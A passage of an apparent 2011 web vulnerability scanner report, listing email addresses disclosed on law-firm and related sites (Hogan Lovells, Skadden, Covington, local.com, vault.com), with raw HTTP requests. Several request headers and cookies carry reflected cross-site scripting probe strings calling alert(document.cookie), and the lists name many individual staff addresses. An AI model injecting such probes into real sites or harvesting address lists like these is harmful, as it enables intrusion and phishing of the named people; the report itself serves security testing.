                                    monique.woo@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=alexander.wood@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    alexander.wood@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=tom.wood@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    tom.wood@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=valerie.woodford@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    valerie.woodford@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=keith.woodhouse@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    keith.woodhouse@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=danielle.woodlee@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    danielle.woodlee@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=nicola.woodroffe@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    nicola.woodroffe@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=alex.woods@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    alex.woods@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=thomas.woolsey@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    thomas.woolsey@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=briony.worthing@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    briony.worthing@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=charlotte.wright@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    charlotte.wright@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=ea.wright@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    ea.wright@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=marek.wroniak@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    marek.wroniak@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=christoph.wuenschmann@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    christoph.wuenschmann@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=alex.xia@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    alex.xia@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=helen.xia@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    helen.xia@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=fiona.xiao@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    fiona.xiao@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=shanshan.xiao@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    shanshan.xiao@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=jessie.xie@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    jessie.xie@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=karen.xu@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    karen.xu@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=liang.xu@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    liang.xu@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=rae.yan@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    rae.yan@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=coral.yanez@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    coral.yanez@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=maria.yaremenko@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    maria.yaremenko@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=takayuki.yasaku@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    takayuki.yasaku@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=joanna.yau@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    joanna.yau@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=teresa.yau@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    teresa.yau@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=william.yavinsky@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    william.yavinsky@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=michelle.yee@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    michelle.yee@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=lucinda.yeh@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    lucinda.yeh@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=geoffrey.yeowart@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    geoffrey.yeowart@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=clayton.yeutter@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    clayton.yeutter@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=jenny.yim@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    jenny.yim@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=emily.yinger@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    emily.yinger@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=susan.yiu@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    susan.yiu@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=kevin.yong@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    kevin.yong@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=stephen.york@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    stephen.york@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=john.young@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    john.young@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=hank.young@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    hank.young@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=catherine.yu@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    catherine.yu@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=simon.yu@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    simon.yu@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=stacy.yuan@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    stacy.yuan@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=holly.yuen@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    holly.yuen@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=lorenz.zabel@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    lorenz.zabel@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=guergana.zabounova@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    guergana.zabounova@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=anita.zacharias@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    anita.zacharias@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=christopher.zaetta@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    christopher.zaetta@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=louise.zafer@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    louise.zafer@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=alina.zagaytova@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    alina.zagaytova@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=rik.zagers@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    rik.zagers@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=tomasz.zak@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    tomasz.zak@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=miguel.zaldivar@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    miguel.zaldivar@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=ekaterina.zamoshkina@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    ekaterina.zamoshkina@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=bob.zapata@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    bob.zapata@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=piotr.zawislak@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    piotr.zawislak@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=ruth.zehetmeier-mueller@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    ruth.zehetmeier-mueller@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=stephen.zempolich@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    stephen.zempolich@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=amy.zhang@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    amy.zhang@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=james.zhang@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    james.zhang@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=kitty.zhang@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    kitty.zhang@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=sarah.zhang@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    sarah.zhang@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=yuping.zhao@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    yuping.zhao@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=tatiana.zhdanova@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    tatiana.zhdanova@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=lu.zhou@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    lu.zhou@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=stella.zhu@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    stella.zhu@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=kristin.zielinski@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    kristin.zielinski@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=marc.zimmerling@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    marc.zimmerling@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=andre.zimmermann@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    andre.zimmermann@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=anthonia.zimmermann@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    anthonia.zimmermann@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=anne.ziolo@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    anne.ziolo@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=nikolas.zirngibl@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    nikolas.zirngibl@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=alexey.zolotukhin@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    alexey.zolotukhin@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=joern.zons@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    joern.zons@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=iliya.zotkin@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    iliya.zotkin@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=michael.zou@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    michael.zou@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=roy.zou@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    roy.zou@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=james.zucker@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    james.zucker@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=jeremy.zucker@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    jeremy.zucker@hoganlovells.com</a>
...[SNIP]...
<a href="javascript:window.open('/email/SendEmailForm.aspx?Email=andreas.zuern@hoganlovells.com', 'winEmail53', 'width=450,height=340,scrollbars');void(0);">
                                    andreas.zuern@hoganlovells.com</a>
...[SNIP]...

17.87. http://www.local.com/business/v3/js/globalbusiness_3_5.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/v3/js/globalbusiness_3_5.js

Issue detail

The following email address was disclosed in the response:

Request

GET /business/v3/js/globalbusiness_3_5.js?v=4030_27585 HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=law+offices&CID=2531/x22b7005%22style%3d%22x%3aexpression(alert(document.cookie))%22e433a090613
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=1zt4rzagg3fnsqfpo4edjv55; localcom=cid=2531/x22b7005"style="x:expression(alert(document.cookie))"e433a090613&loc=Dallas%2c+TX&kw=law+offices&uid=5674db03-c44a-460f-b7cc-fff20017bf9a&expdate=634336196679042647&bc=Results+for+law+offices+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dlaw%2boffices%26CID%3d2531%2fx22b7005%22style%253d%22x%253aexpression(alert(document.cookie))%22e433a090613&rs=law+offices|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=2531/x22b7005"style="x:expression(alert(document.cookie))"e433a090613&exp=634310294679042647

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
ETag: "146be5643bfa9aaba91d3e4326dd137"
Server: Microsoft-IIS/7.5
X-CacheLevel: none
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Cache-Control: public, max-age=41906
Expires: Thu, 20 Jan 2011 05:33:03 GMT
Date: Wed, 19 Jan 2011 17:54:37 GMT
Connection: close
Content-Length: 404232


ic0n=function(parentObj){var _components=[];var _objid=new Date()*1;var root={OnDom:function(func){this.AddListener(window,"load",func);},OnLoad:function(func){this.AddListener(window,"load",func);},
...[SNIP]...
dateUserInfo');if(!Environment.PluckUser.LoggedIn){dash.ExpandDash();return false;}
if(!opt)return false;var debug=false;var debugWipeExtendedProfile=((debug)&&(Environment.PluckUser.Username.indexOf("kueck@local.com")>
...[SNIP]...

17.88. http://www.local.com/js/s_code.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.local.com
Path:   /js/s_code.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/s_code.js HTTP/1.1
Host: www.local.com
Proxy-Connection: keep-alive
Referer: http://www.local.com/results.aspx?keyword=law+offices&CID=2531/x22b7005%22style%3d%22x%3aexpression(alert(document.cookie))%22e433a090613
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=1zt4rzagg3fnsqfpo4edjv55; localcom=cid=2531/x22b7005"style="x:expression(alert(document.cookie))"e433a090613&loc=Dallas%2c+TX&kw=law+offices&uid=5674db03-c44a-460f-b7cc-fff20017bf9a&expdate=634336196679042647&bc=Results+for+law+offices+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dlaw%2boffices%26CID%3d2531%2fx22b7005%22style%253d%22x%253aexpression(alert(document.cookie))%22e433a090613&rs=law+offices|Dallas%2c+TX!~Dallas%2c+TX; localcom_s=cid=2531/x22b7005"style="x:expression(alert(document.cookie))"e433a090613&exp=634310294679042647

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
ETag: "1cfb478e197fb5e7142cfaf9d58bac51"
Server: Microsoft-IIS/7.5
X-CacheLevel: none
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Cache-Control: public, max-age=41860
Expires: Thu, 20 Jan 2011 05:32:18 GMT
Date: Wed, 19 Jan 2011 17:54:38 GMT
Connection: close
Content-Length: 20798


var s=s_gi(s_account)
s.trackDownloadLinks=true
s.trackExternalLinks=true
s.trackInlineStats=true
s.linkDownloadFileTypes="exe,zip,wav,mp3,mov,mpg,avi,wmv,pdf,doc,docx,xls,xlsx,ppt,pptx"
s.linkIntern
...[SNIP]...
.hav()+q+(qs?qs:s."
+"rq(^C)),0,id,ta);qs`e;`Wm('t')`5s.p_r)s.p_r(`R`X`e}^7(qs);^z`p(@i;`l@i`L^9,`G$71',vb`R@G=^D=s.`N`i=s.`N^M=`F@0^y=s.ppu=^p=^pv1=^pv2=^pv3`e`5$x)`F@0@G=`F@0eo=`F@0`N`i=`F@0`N^M`e`5!id@Ls.tc#Ctc=1;s.f"
+"lush`a()}`2$m`Atl`0o,t,n,vo`1;s.@G=@wo`R`N^M=t;s.`N`i=n;s.t(@i}`5pg){`F@0co`0o){`K@J\"_\",1,#B`2@wo)`Awd@0gs`0$S{`K@J$p1,#B`2s.t()`Awd@0dc`0$S{`K@J$p#B`2s.t()}}@3=(`F`J`Y`8`4@us@d0`Rd=^L;
...[SNIP]...

17.89. http://www.political.cov.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.political.cov.com
Path:   /

Issue detail

The following email address was disclosed in the response:

Request

GET / HTTP/1.1
Host: www.political.cov.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 16:55:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=18273037;expires=Fri, 11-Jan-2041 16:55:51 GMT;path=/
Set-Cookie: CFTOKEN=87095538;expires=Fri, 11-Jan-2041 16:55:51 GMT;path=/
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>
   <title>Covington Political Broadcasting Law</title
...[SNIP]...
<a href="mailto:smcdonald@cov.com">smcdonald@cov.com</a>
...[SNIP]...

17.90. http://www.skadden.com/Index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.skadden.com
Path:   /Index.cfm

Issue detail

The following email addresses were disclosed in the response:

Request

GET /Index.cfm?contentID=44&alphaSearch=M HTTP/1.1
Host: www.skadden.com
Proxy-Connection: keep-alive
Referer: http://www.skadden.com/Index.cfm?contentID=3
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=1.1295451571.2.2.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/13; __utma=34916643.540692983.1295449749.1295449749.1295451571.2; __utmc=34916643; __utmz=34916643.1295451571.2.2.utmccn=(referral)|utmcsr=burp|utmcct=/show/13|utmcmd=referral; BACKLINK=contentID%3D42%26itemID%3D1478%2690bb3%22%2Dalert%281%29%2D%220eb36443031%3D1%2CcontentID%3D3; __utma=1.1036495289.1295449749.1295449749.1295451571.2; __utmc=1; __utmb=1.4.10.1295451571; __utmb=34916643

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:40:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: BACKLINK=contentID%3D3%2CcontentID%3D44%26alphaSearch%3DM;expires=Fri, 11-Jan-2041 15:40:59 GMT;path=/
Content-Type: text/html; charset=UTF-8


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://ww
...[SNIP]...
<A HREF="mailto:gary.macdonald@skadden.com">
...[SNIP]...
<A HREF="mailto:bruce.macaulay@skadden.com">
...[SNIP]...
<A HREF="mailto:rick.madden@skadden.com">
...[SNIP]...
<A HREF="mailto:colleen.mahoney@skadden.com">
...[SNIP]...
<A HREF="mailto:chris.mallon@skadden.com">
...[SNIP]...
<A HREF="mailto:christopher.malloy@skadden.com">
...[SNIP]...
<A HREF="mailto:richard.marmaro@skadden.com">
...[SNIP]...
<A HREF="mailto:steven.matays@skadden.com">
...[SNIP]...
<A HREF="mailto:matthew.matule@skadden.com">
...[SNIP]...
<A HREF="mailto:bernd.mayer@skadden.com">
...[SNIP]...
<A HREF="mailto:brian.mccarthy@skadden.com">
...[SNIP]...
<A HREF="mailto:mark.mcdermott@skadden.com">
...[SNIP]...
<A HREF="mailto:martha.mcgarry@skadden.com">
...[SNIP]...
<A HREF="mailto:lynn.mcgovern@skadden.com">
...[SNIP]...
<A HREF="mailto:edward.meehan@skadden.com">
...[SNIP]...
<A HREF="mailto:ron.meisler@skadden.com">
...[SNIP]...
<A HREF="mailto:greg.miao@skadden.com">
...[SNIP]...
<A HREF="mailto:edward.micheletti@skadden.com">
...[SNIP]...
<A HREF="mailto:david.midvidy@skadden.com">
...[SNIP]...
<A HREF="mailto:michael.mies@skadden.com">
...[SNIP]...
<A HREF="mailto:jessica.miller@skadden.com">
...[SNIP]...
<A HREF="mailto:maxwell.miller@skadden.com">
...[SNIP]...
<A HREF="mailto:timothy.miller@skadden.com">
...[SNIP]...
<A HREF="mailto:gregory.milmoe@skadden.com">
...[SNIP]...
<A HREF="mailto:jeffrey.mishkin@skadden.com">
...[SNIP]...
<A HREF="mailto:paul.mitchard@skadden.com">
...[SNIP]...
<A HREF="mailto:harold.moore@skadden.com">
...[SNIP]...
<A HREF="mailto:john.moot@skadden.com">
...[SNIP]...
<A HREF="mailto:patricia.moran@skadden.com">
...[SNIP]...
<A HREF="mailto:christopher.morgan@skadden.com">
...[SNIP]...
<A HREF="mailto:peter.morrison@skadden.com">
...[SNIP]...
<A HREF="mailto:richard.muglia@skadden.com">
...[SNIP]...
<A HREF="mailto:charles.mulaney@skadden.com">
...[SNIP]...
<A HREF="mailto:allan.murray-jones@skadden.com">
...[SNIP]...
<A HREF="mailto:scott.musoff@skadden.com">
...[SNIP]...
<A HREF="mailto:allan.mutchnik@skadden.com">
...[SNIP]...
<A HREF="mailto:alan.myers@skadden.com">
...[SNIP]...
<A HREF="mailto:peter.mullen@skadden.com">
...[SNIP]...
<A HREF="mailto:neil.macdonald@skadden.com">
...[SNIP]...
<A HREF="mailto:penny.madden@skadden.com">
...[SNIP]...
<A HREF="mailto:joy.maddox@skadden.com">
...[SNIP]...
<A HREF="mailto:kristin.major@skadden.com">
...[SNIP]...
<A HREF="mailto:alexandra.margolis@skadden.com">
...[SNIP]...
<A HREF="mailto:gerard.martin@skadden.com">
...[SNIP]...
<A HREF="mailto:donna.mcdevitt@skadden.com">
...[SNIP]...
<A HREF="mailto:james.mcdonald@skadden.com">
...[SNIP]...
<A HREF="mailto:christy.mcelhaney@skadden.com">
...[SNIP]...
<A HREF="mailto:michael.mcgrane@skadden.com">
...[SNIP]...
<A HREF="mailto:ronda.mckaig@skadden.com">
...[SNIP]...
<A HREF="mailto:anthony.mechcatie@skadden.com">
...[SNIP]...

17.91. http://www.vault.com/scripts/jquery.swapimage.min.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.vault.com
Path:   /scripts/jquery.swapimage.min.js

Issue detail

The following email address was disclosed in the response:

Request

GET /scripts/jquery.swapimage.min.js HTTP/1.1
Host: www.vault.com
Proxy-Connection: keep-alive
Referer: http://www.vault.com/wps/portal/usa/rankingsf6c40'%3balert(document.cookie)//dba4d06d54c/individual
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=0000D17FxsLaClL9SFBlj1f2sjv:140gkm3u6; NSC_xxx.wbvmu.dpn=ffffffffd2d89a6f45525d5f4f58455e445a4a423660

Response

HTTP/1.1 200 OK
Date: Wed, 19 Jan 2011 15:35:22 GMT
Server: IBM_HTTP_Server
Last-Modified: Tue, 24 Mar 2009 17:37:16 GMT
ETag: "b184e1-9a1-d5822b00"
Accept-Ranges: bytes
Vary: Accept-Encoding,User-Agent
Cache-Control: max-age=7200, must-revalidate
Content-Type: application/x-javascript
